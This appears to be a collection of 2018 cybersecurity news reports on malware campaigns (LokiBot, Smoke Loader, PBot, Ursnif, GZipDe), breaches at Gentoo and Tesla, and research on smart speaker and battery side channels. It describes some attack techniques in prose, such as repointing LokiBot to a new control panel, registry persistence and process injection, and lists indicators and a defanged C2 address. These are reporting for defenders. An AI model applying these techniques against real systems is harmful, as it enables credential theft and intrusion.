Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?
That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.
Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different than the individuals’ ATM PINs. As there are with passwords, there are recommended ways to pick a good PIN, too. However, not everyone follows these. Many take the risk of prioritizing handiness over security by setting up passwords that are easy to remember — but equally as easy for others to guess.
Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.
And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.
Research also found the motion-sensitive components of smartwatches could capture PIN data, then allow hackers to figure out what numbers they enter with up to 80 percent accuracy on the first attempt.
You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.
For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.
Image by Rahul Chakraborty
The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.
Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.
What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.
Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker possess some of your most lucrative information?
Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.
About the Author:
Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.
Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.2018 securityaffairs Virus
An expert found evidences that demonstrate the current distributed LokiBot malware samples were “hijacked” by a third actor.
According to the researcher who goes online by the Twitter handle “d00rt,” samples of the LokiBot malware samples being distributed in the wild are modified versions of the original sample.
d00rt
@D00RT_RM
I just released an article where are evidences that demonstrate the current distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are Scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf …
10:25 AM - Jul 6, 2018
d00rt/hijacked_lokibot_version
Contribute to hijacked_lokibot_version development by creating an account on GitHub.
github.com
89
84 people are talking about this
Twitter Ads info and privacy
The Lokibot malware has been active since 2015, it is an infostealer that was involved in many malspam campaigns aimed at harvest credentials from web browsers, email clients, admin tools and that was also used to target cryptocoin-wallet owners.
The original LokiBot malware was developed and sold by online by a hacker who goes online by the alias “lokistov,” (aks Carter).
The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.
According to d00rt there is an explanation for such kind of proliferation online, a threat actor may have “hijacked” the original malware, and even without having a direct access to the original source code he was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.
The expert reversed many pieces of malware and found five references to the C&C server, four of them are encrypted using Triple DES algorithm and one using a simple XOR cipher.
The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.
According to the expert, the Decrypt3DESstring found in the sample he analyzed is different from the ones available in previous variants of the LokiBot malware
The new Decrypt3DESstring function discovered in new samples always return value from the XOR-protected string, instead of Triple DES strings.
“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.
“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”
The expert explained that anyone with a new sample of LokiBot could use a simple HEX editor to modify the program and add its custom URLs for receiving the stolen data.
“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.
“There exist a builder in the underground forums which is able to create new
LokiBot samples with a custom control panel. As I explained before, this builder
encrypts the control panel with xor an writes it in the “x” section.
d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.
The author of LokiBot malware, meantime, has launched the new version 2.0 and he is offering it on many forums.
The decryption function was also being used to get registry values required for making the malware persistent on a system, but since after patching the decryption function only returns a URL, the new LokiBot samples fails to restart after the device reboots.
The expert also discovered that the modification introduced to patch the malware introduces a couple of bugs in malicious code.
Some strings of LokiBot malware are encrypted and the malware uses the function Decrypt3DESstring to decrypt them. After patching this function, it always returns the same string that is the XORed url which is located at “x” section.
“The following is the registry key name used in persistence:
Software\Microsoft\Windows\CurrentVersion\Run
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.
Further technical details for the threat are reported in the research paper published by the expert on GitHub.
Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.2018 securityweek Virus
A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.
The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.
According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.
Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.
The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.
Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.
Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.
NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.
In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.
NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.
According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.
New Smoke Loader campaign aims at stealing multiple credentials from many applications
6.7.2018 securityaffairs Virus
Recently experts from Talos security spotted a malware campaign leveraging Smoke Loader to steal credentials from a broad range of applications.
Security experts have discovered a new malware campaign leveraging Smoke Loader to steal credentials from web browsers, email clients, and other popular applications.
The attack chain starts with messages using a weaponized Word document as an attachment, the hackers attempt to trick victims into opening it and enable the embedded macro.
Once executed, the macro downloads the TrickBot banking Trojan that in this campaign is used to fetch the Smoke Loader backdoor.
Smoke Loader is a tiny dropper used to install on the infected system other malware families, but in this specific campaign, the experts observed an inversion of roles, with TrickBot that downloads it.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader.” reads the analysis published by Talos.
“This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,”
While malware frequently iterates through process lists to find a process to inject, this new backdoor variant calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe.
The malware also uses the PROPagate technique to inject code into Explorer, the same technique recently implemented by RIG Exploit Kit operators to deliver cryptocurrency miners.
The malware also implements several anti-analysis techniques, along with anti-debugging and anti-VM checks and the analysis of threads associated with the scanning for processes and windows belonging to analysis tools.
The Smoke Loader variant used in this campaign was receiving five plugins, each of them was executed in its own Explorer.exe process.
The plugins were designed to steal sensitive information from the infected machine and stored credentials and sensitive information managed by the web browser.
“In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan, which installed five additional Smoke Loader plugins.” continues the analysis.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers”
The first plugin implements roughly 2,000 functions and it is able to target a broad range of applications, including Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird, to steal hostname and credentials. This plugin also attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.
The second plugin recursively searches through directories looking for files to parse and exfiltrate.
The third plugin injects into browsers to intercept credentials and cookies as they are transferred over HTTP and HTTPS, while the fourth hooks ws2_32!send and ws2_32!WSASend to attempt to steal credentials for ftp, smtp, pop3, and imap.
The fifth plugin injects code into TeamViewer.exe to steal credentials
“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools.” concludes the analysis.
“This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.
New Smoke Loader Attack Targets Multiple Credentials
5.7.2018 securityweek Virus
A recently detected Smoke Loader infection campaign is attempting to steal credentials from a broad range of applications, including web browsers, email clients, and more.
The attacks begin with malicious emails carrying a Word document as an attachment. Using social engineering, the attackers attempt to lure victims into opening the document and executing an embedded macro.
Once executed, the macro initiates a second stage and downloads the TrickBot malware, which instead fetches the Smoke Loader backdoor, Cisco Talos reports.
Smoke Loader has been long used as a downloader for various malware families, including banking Trojans, ransomware, and crypto-currency miners. In some of the previous campaigns, it was also used as a dropper for TrickBot, but it appears tables have turned now.
“Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers,” Talos says.
The new backdoor variant, the security researchers reveal, doesn’t iterate through process lists to find a process to inject code into, but calls the Windows API GetShellWindow instead, then calls GetWindowThreadProcessId to get the process ID of evfdxplorer.exe. It also uses the PROPagate technique to inject code into Explorer.
First described in late 2017, the method hasn’t been adopted by another malware to date, and no public Proof-of-Concept (PoC) has been published to date. Smoke Loader is the first to use the technique, and FireEye too reported this last week.
The malware also includes a series of anti-analysis techniques, along with anti-debugging and anti-VM checks.
Unlike previous attacks, where Smoke Loader would drop additional payloads, the backdoor was observed receiving five plugins instead. Each plugin was executed in its own Explorer.exe process, but older techniques were used to inject each plugin into those processes. The attack ultimately results in six Explorer.exe processes running on the infected machine.
All of the plugins were designed to steal sensitive information from the victim machine and explicitly target stored credentials and sensitive information transferred over a browser.
The first plugin contains around 2,000 functions and targets Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird to steal hostname, username, and password data. Additionally, it attempts to steal information from the Windows Credential Manager, as well as POP3, SMTP, IMAP credentials.
The second plugin searches through directories for files to parse and exfiltrate. The third plugin injects into browsers to intercept credentials and cookies, the fourth attempts to steal credentials for ftp, smtp, pop3, and imap, while the fifth injects code into TeamViewer.exe for credential theft.
“We have seen that the Trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date,” Talos concludes.
Adware already infected at least 78000 Fortnite Players
5.7.2018 securityaffairs Virus
Rainway reported that tens of thousands of Fortnite players have been infected with an adware while downloading fake v-buck generators
Fortnite continues to be one of the most popular game and crooks are attempting to target millions of fans in different ways.
In June, experts observed cyber criminals attempting to exploit the interest in forthcoming Fortnite Android to infect millions of fans.
Not only users interested in the Android version of the popular game are the target of cyber criminals, crooks are now targeting gamers searching for Fortnite v-bucks generator.
v-buck is the in-game currency can be spent in both the Battle Royale PvP mode and the Save the World PvE campaign, in the former to purchase new customization items while in the latter to purchase Llama Pinata card packs.
Clearly many gamers search for v-buck generators, but these applications may hide dangerous malware.
Researchers at the Web-based game-streaming platform Rainway reported that tens of thousands of Fortnite players have already attempted to download the fake generators with the result of infecting their systems.
The malicious code associated with this campaign is a strain of malware that hijacks encrypted HTTPS web sessions to inject fraudulent ads into every website they visit.
“On the early morning of June 26th, we began receiving hundreds of thousands of error reports to our tracker. Not feeling very excited to see such an influx of events on a Tuesday the engineering team was a bit flustered, after all, we hadn’t released any updates to that particular piece of our solution.” reads the blog post published by Rainway CEO Andrew Sampson.
The experts at Rainway started the investigation after they were noticing hundreds of thousands of error reports from server logs. The internal staff discovered that the systems of their users were attempting to connect with various ad platforms.
Since Rainway system only allows to load content from whitelisted domains, all the requests discovered by the company attempted to download ads from other domains and for this reason they were triggering connection errors.
Rainway experts analyzed hundreds of Fortnite exploit software searching for the ones that were generating the same errors reported by Rainway users.
Rainway discovered that the errors were generated by systems that were infected with a fake V-Bucks generator.
Searching online it is quite easy to find any kind of software that poses as a Fortnite hack tool, these applications are advertised through YouTube videos and claim to allow players to generate free V-Bucks, in addition to a classic aimbot.
Once the malicious code has infected the player’s system, it will immediately install a root certificate and configure the Windows machine to act as a proxy for the web traffic.
This specific campaign was delivering adware that alters the pages of a web request to inject ads.
The Rainway team was able to identify the server hosting the malware, they were compromised by attackers that were abusing them. The experts informed the company operating the compromised servers quickly removed the malware.
“Now, the adware began altering the pages of all web request to add in tags for Adtelligent and voila, we’ve found the source of the problem — now what?”
“We began by sending an abuse report to the file host, and the download was removed promptly, this was after accumulating over 78,000 downloads. We also reached out to Adtelligent to report the keys linked to the URLs. We have not received a response at this time. SpringServe quickly worked with us to identify the abusive creatives and remove them from their platform.” continues Rainway.
Rainway is warning gamers to not to install hack tools or game cheats.
Given Fortnite’s popularity, we can imagine that many other cases will emerge in the forthcoming weeks.
Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.2018 securityweek Virus
Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.
“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.
According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.
Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.
Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.
“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.
Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 2018. GitHub has suspended the hacked account.
“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.
Pbot: evolving adware
29.6.2018 Kaspersky Virus
The adware PBot (PythonBot) got its name because its core modules are written in Python. It was more than a year ago that we detected the first member of this family. Since then, we have encountered several modifications of the program, one of which went beyond adware by installing and running a hidden miner on victim computers:
Miner code installed through PBot
Two other versions of PBot we detected were restricted to the goal of placing unwanted advertising on web pages visited by the victim. In both versions, the adware initially attempts to inject a malicious DLL into the browser. The first version uses it to run JS scripts to display ads on web pages, the second — to install ad extensions in the browser. The latter is the more interesting of the two: developers are constantly releasing new versions of this modification, each of which complicates the script obfuscation. Another distinctive feature of this Pbot variation is the presence of a module that updates scripts and downloads fresh browser extensions.
Throughout April, we registered more than 50,000 attempts to install PBot on computers of users of Kaspersky Lab products. The following month this number increased, indicating that this adware is on the rise. PBot’s target audience is mainly in Russia, Ukraine, and Kazakhstan.
Geography of infection attempts
Distribution methods
PBot is generally distributed through partner sites whose pages implement scripts to redirect users to sponsored links.
Here is the standard PBot propagation scheme:
The user visits the partner site.
When any point on the page is clicked, a new browser window pops up that opens an intermediate link.
The intermediate link redirects the user to the PBot download page, which is tasked with downloading and running the adware on the victim computer by hook or by crook. The following is a section of code from one such page:
Code of a page propagating PBot
An HTA file is downloaded. On startup this file downloads the PBot installer.
PBot propagation chain
Operating logic
PBot consists of several Python scripts executed in sequence. In the latest versions of the program, they are obfuscated using Pyminifier.
Obfuscated script code
In the new versions of PBot, modules are executed according to the following scheme:
PBot installation
The source file *.hta downloads an executable file, which is the NSIS installer of PBot, to %AppData%.
The installer drops a folder with the Python 3 interpreter, Python scripts, and a browser extension into %AppData%.
Using the subprocess library, the ml.py script adds two tasks to Windows Task Scheduler. The first is tasked with executing ml.py when the user signs into the system, while the second runs app.py daily at 5:00. In addition, the winreg library is used to write the app.py script to the autoloader.
The launchall.py script runs app.py, which handles the update of PBot scripts and the download of new browser extensions.
Next, launchall.py checks whether the following processes are active:
browser.exe
chrome.exe
opera.exe
If the processes are found, the DLL-generating script brplugin.py is started. The resulting DLL is injected into the launched browser and installs the ad extension.
Writing the DLL to the browser process memory and executing the library
The browser extension installed by PBot typically adds various banners to the page, and redirects the user to advertising sites.
PBot result: Pop-up window with an ad clip on www.kaspersky.com
Conclusion
In pursuit of profit, adware owners often resort to installing their products on the sly, and PBot developers are no exception. They release new versions (and update them on user computers), complicating their obfuscation to bypass protection systems.
Kaspersky Lab solutions detect PBot with the following verdicts:
AdWare.Win32.PBot
AdWare.NSIS.PBot
AdWare.HTML.PBot
AdWare.Python.PBot
IoCs:
3cd47c91d8d8ce44e50a1785455c8f7c
1aaedcf1f1ea274c7ca5f517145cb9b5
bb2fbb72ef683e648d5b2ceca0d08a93
23e7cd8ca8226fa17e72df2ce8c43586
ad03c82b952cc352b5e6d4b20075d7e1
0cb5a3d428c5db610a4565c17e3dc05e
3a6ad75eb3b8fe07c6aca8ae724a9416
184e16789caf0822cd4d63f9879a6c81
Hackers compromised Gentoo Linux GitHub Page and planted a malicious code
29.6.2018 securityaffairs Virus
The development team of the Gentoo Linux distribution notifies users that hackers compromised one of the GitHub accounts and planted a malicious code.
Developers of the Gentoo Linux distribution announced that hackers compromised one of the GitHub accounts used by the organization and planted a malicious code.
“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there.” Gentoo wrote on its website.
“We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,”
The Gentoo developer Francisco Blas Izquierdo Riera confirmed that attackers took control over the Gentoo repository on Github and replaced the portage and musl-dev trees with malicious ebuilds intended to delete all files from a system. The malicious software could not work on GitHub and the development team has already removed it.
“I just want to notify that an attacker has taken control of the Gentoo organization in Github and has among other things replaced the portage and musl-dev trees with malicious versions of the ebuilds intended to try removing all of your files.” explained Francisco Blas Izquierdo Riera.
“Whilst the malicious code shouldn’t work as is and GitHub has now removed the organization, please don’t use any ebuild from the GitHub mirror ontained before 28/06/2018, 18:00 GMT until new warning.”
What is an ebuils?
“An ebuild file is a text file, used by Gentoo package managers, which identifies a specific software package and how the Gentoo package manager should handle it. It uses a bash-like syntax style and is standardized through the EAPI version.” reported Gentoo.
“Gentoo Linux uses ebuilds as the package management format for individual software titles. These ebuilds contain metadata about the software (the name and version of the software, which license the software uses, and the home page), dependency information (both build-time as well as run-time dependencies), and instructions on how to deal with the software (configure, build, install, test …).”
According to Gentoo, the code hosted on its own infrastructure is not impacted. The Gentoo repository mirrors are hosted in a separate GitHub account that were not affected by the security breach.
Gentoo users have been informed not to utilize any ebuilds downloaded from the compromised GitHub account prior to 18:00 GMT on June 28, 2018.
As part of the incident response, GitHub has suspended the hacked account, users can verify the signature of the commits to stay secure.
“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.
Mobile Devices Exposed to Spying via Malicious Batteries: Researchers
26.6.2018 securityweek Virus
A team of researchers has demonstrated that specially crafted batteries installed in a smartphone can allow malicious actors to harvest and exfiltrate sensitive information.
Researchers from Technion, UT Austin and Hebrew University showed that an attacker can use a malicious battery to obtain various types of information from a device by continuously monitoring power traces. Monitoring the GPU and DRAM can work, but the CPU and the touchscreen leak the most information, experts said.
Experiments have shown that attackers can – with various degrees of accuracy – deduce characters typed via the touchscreen, recover browsing history, and detect incoming calls and when a photo has been taken. Exfiltrating the data is also possible, one bit at a time, through the device’s web browser.
Rogue Batteries Can Be Used to Spy on Mobile Devices, Researchers Warn
The level of accuracy for determining keystrokes was 36%, and researchers showed that attackers can even search for passwords. In the case of detecting which website the victim has visited from a list of Alexa Top 100 sites, the researchers achieved an accuracy of 65%. An attacker can – with 100% accuracy – detect when a phone call has been made. Experiments also showed a high accuracy related to the use of the camera. In addition to detecting when a photo has been taken, an attacker can obtain data on the use of the flash and lighting conditions, researchers said in their paper.
The method requires replacing the targeted device’s battery with a malicious one, either through a supply chain, evil maid or other type of attack. Due to this reason, combined with the fact that the exfiltration and data harvesting are slow and not always accurate, it’s unlikely that such attacks will be seen in the wild any time soon.
On the other hand, the attack is interesting, especially since it’s stealthy – it has a small hardware footprint and it does not require the installation of any software on the targeted device –, it has a low cost, and it leverages a component that is often replaced by users. In one attack scenario described by researchers, the attacker sells batteries online, offering low prices or extended warranty to attract potential victims.
As for data exfiltration, researchers used the Battery Status API. This API was removed by Mozilla and Apple from their web browsers after experts showed that it posed some potentially serious privacy risks, but it’s still present in Chrome.
This API exposes three parameters: time to full charge and discharge, battery level, and charging state. Experts showed that the charging state parameter (which has a value of 0 or 1 when the battery is charging or discharging) can be manipulated for data exfiltration via the wireless charging technology.
When a phone is charged wirelessly, the battery charging state parameter changes when an active transmitter is detected by the device. By placing a circuit that mimics the wireless charger inside the battery, an attacker can control the charging state to send out bits of “0” or “1”. The attacker needs to convince the victim to access a specially crafted website that can read this data via the Battery Status API. Since this is a bidirectional communication channel, the malicious battery can be configured to detect when the attacker’s site is visited by the victim.
However, the time it takes to detect the transition between not charging and charging is 3.9 seconds and the transition back to not charging is 1.6 seconds, which results in an exfiltration rate of 0.1-0.5 bits per second.
“The attack may seem like a stretch (requires physical battery replacement – or poisoning hardware at a factory), and at this moment one can imagine multiple simpler methods,” commented Lukasz Olejnik, one of the researchers whose work led to Mozilla and Apple removing support for the Battery Status API a couple of years ago. “Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.”
Last year, Olejnik conducted an analysis of the security and privacy implications associated with the ambient light sensors present in phones, tablets and laptops.
CSE Malware ZLab – A new variant of Ursnif Banking Trojan served by the Necurs botnet hits Italy
25.6.2018 securityaffairs Virus
Malware researchers from CSE Cybsec ZLab discovered a missed link between the Necurs Botnet and a variant of the Ursnif trojan that recently hit Italy.
Starting from 6th June, a new version of the infamous banking trojan Ursnif hit Italian companies. This malware is well known to the cyber-security community, the Ursnif banking Trojan was the most active malware code in the financial sector in 2016 and the trend continued through 2017 to date.
In previous campaigns, the Ursnif banking Trojan targeted users in Japan, North America, Europe and Australia, later the authors improved their evasion technique to target users worldwide, especially in Japan.
The malware is able to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites.
The malware has been active since at least 2009, as reported by Microsoft.
The technical information reported by Microsoft refers to an older version of the malware, but the version that is spreading in Italy presents many improvements.
CSE Cybsec ZLab researchers are conducting analysis on the latest version of the malware. The experts started the investigation after the discovery of a suspicious file that was used in a targeted attack against one of its customers.
The attachment used in the campaign that hit Italian companies is a weaponized Microsoft Word document, it uses a social engineering technique to trick users into enabling macros in order to allow the correct view of its content.
Ursnif phishing Word document screen
Moreover, Ursnif once infected a new machine will attempt to spread to any other users in the address book of the compromised email accounts.
In order to trick the victim into opening the malicious email, the message is presented as the reply to an existing conversation conducted by the victim in the past.
While investigating the domains involved in the last phishing campaign against the Italian companies, the researchers discovered many of them were registered by the same email address, “whois-protect[@]hotmail[.]com.”
This email address is directly connected to infamous Necurs Botnet, the malicious architecture that was used in the past months to push many other malware, including Locky, Jaff, GlobeImposter, Dridex , Scarab and the Trickbot.
Further details on the variant of the Ursnif malware that targeted Italian firms, including IoCs and Yara Rules are available in the report published by researchers at ZLAb.
You can download the full ZLAB Malware Analysis Report at the following URL:
http://csecybsec.com/download/zlab/20180621_CSE_Ursnif-Necurs_report.pdf
Tesla Breach: Malicious Insider Revenge or Whistleblowing?
23.6.2018 securityweek Virus
Just before midnight last Sunday evening (June 17, 2018), Elon Musk sent an email to all staff. He was dismayed, he said, to learn about a Tesla employee "making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties."
This was a mainstream malicious insider attack -- but there may be more to it than meets the eye. The motive, according to Musk, was revenge: "he wanted a promotion that he did not receive." But this incident goes way beyond simple revenge sabotage, and includes the theft of sensitive data and the export of that data to unknown outside parties.
The incident could have been triggered by revenge and aggravated by bribery; but until and unless those outside parties can be identified for certain, the true cause of the attack will remain speculative.
Musk himself is willing to speculate with insinuation. "As you know," he told employees, "there are a long list of organizations that want Tesla to die. These include Wall Street short-sellers, who have already lost billions of dollars and stand to lose a lot more." He then added oil and gas companies, who "rumor has it... are sometimes not super nice;" and the "big gas/diesel car company competitors [who already cheat on pollution levels, and] maybe they're willing to cheat in other ways?" The only potential risks he excluded were nation-states wishing to give their own nascent industries a technology boost, cyber criminals wishing to ransom Tesla or sell to competitors, and -- dare we say it -- whistleblowing.
Such is the nature of attribution for cybercrimes, it may never be known who -- if anyone outside of the malicious insider himself -- is really behind the incident. Sometimes it is only national intelligence agencies who know who did what on the internet through their much wider access to signals intelligence -- but those same agencies can equally feel that it is not in the national interest to get involved. If it was a foreign nation dabbling in IP theft, the intelligence agencies might go public. If it was a competitor or major national industry, the agencies might take the view that their role is not law enforcement.
In reality, the destination of the stolen data may already be known.
The attack itself seems to be typical insider work, using false usernames. We don't know whether those false usernames were existing accounts, or new accounts created by the attacker. In either case, however, it seems certain that the attacker enjoyed higher system privileges than was necessary.
“This," comments Joseph Carson, chief security scientist at Thycotic, "is a major reminder why privileged access management (PAM) is a must-have for organizations that deal with sensitive information or personal information -- and why least-privilege is a practice being adopted by many organizations."
It's a problem made more difficult, he suggests, because companies try to protect the privileged accounts they know about, which in most cases isn't effective. "Organizations continue to fail at the most important aspect of restricting privileged access, which is proactively discovering privileged accounts in the environment. It appears that Tesla have failed to do that most important step in least-privilege, which is discovering and detecting unapproved privileged access."
Since Musk's original disclosure of the breach by internal email on Sunday, matters have moved forward rapidly. On Wednesday, Tesla filed a complaint against the employee -- named as Martin Tripp -- in the Nevada District Court. This complaint admits that "Tesla has only begun to understand the full scope of Tripp’s illegal activity, but he has thus far admitted to writing software that hacked Tesla’s manufacturing operating system (“MOS”) and to transferring several gigabytes of Tesla data to outside entities."
Within a few months of Tripp joining Tesla, says the complaint, "his managers identified Tripp as having problems with job performance and at times being disruptive and combative with his colleagues. As a result of these and other issues, on or about May 17, 2018, Tripp was assigned to a new role. Tripp expressed anger that he was reassigned. Thereafter, Tripp retaliated against Tesla by stealing confidential and trade secret information and disclosing it to third parties, and by making false statements intended to harm the company."
But according to a report published today by the BBC, Tripp "says he’s a whistleblower being smeared for speaking out about standards and safety at the company, and deserves protection." The implication is that Tripp provided the documents used by Business Insider in its June 4 report; 'Internal documents reveal Tesla is blowing through an insane amount of raw material and cash to make Model 3s, and production is still a nightmare'.
The BBC also publishes extracts from a rapid-fire email exchange between Musk and Tripp that took place on Wednesday. At one point, Musk writes, "You should ashamed of yourself for framing other people. You're a horrible human being." This is likely a reference to Tripp's hacking software being found on three other employees' computers. The legal complaint alleges, "His hacking software was operating on three separate computer systems of other individuals at Tesla so that the data would be exported even after he left the company and so that those individuals would be falsely implicated as guilty parties."
Tripp responded, "I NEVER 'framed' anyone else or even insinuated anyone else as being involved in my production of documents of your MILLIONS OF DOLLARS OF WASTE, Safety concerns, lying to investors/the WORLD. Putting cars on the road with safety issues is being a horrible human being!"
Whistleblowing is one optional reason for the data theft not mentioned by Musk in his June 17 email to staff, even though the Business Insider allegation mentions 'internal documents' and was published two weeks earlier. The full truth of what happened in this incident is likely to be exposed in court rather than via computer forensics.
However, in information security terms, an insider stole sensitive documents from Tesla. The motive is not as important as the act. It seems that Tesla does not operate adequate least-privilege measures, and does not have an internal traffic monitoring system capable of detecting and blocking the unsanctioned exfiltration of gigabytes of data. This failure has left Tesla with a PR nightmare that it must now manage.
New Encrypted Downloader Delivers Metasploit Backdoor
23.6.2018 securityweek Virus
A series of cyber-attacks targeting the Middle Eastern region use an encrypted downloader to deliver a Metasploit backdoor, AlienVault reports.
The attacks start with a malicious document containing parts of an article about the next Shanghai Cooperation Organization Summit, originally published at the end of May on a Middle Eastern news network.
The Office document contains malicious macro code designed to execute a Visual Basic script (stored as a hexadecimal stream) and launch a new task in a hidden Powershell console. This attack stage is meant to serve a .NET downloader that uses a custom encryption method to obfuscate process memory and evade antivirus detection.
Dubbed GZipDe, the downloader appears based on a publicly available reverse-tcp payload to which the malware author added a new layer of encryption payload.
“It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection,” AlienVault reveals.
A new memory page with execute, read and write privileges is created, then a decrypted payload is executed. Courtesy of a special handler that controls process’ access to system resources, only one instance of the malware can run at the same time.
Shellcode in the downloader connects to a server at 175.194.42[.]8 to deliver the final payload. The server wasn’t up during analysis, but it was previously recorded serving a Metasploit payload, the security researchers note.
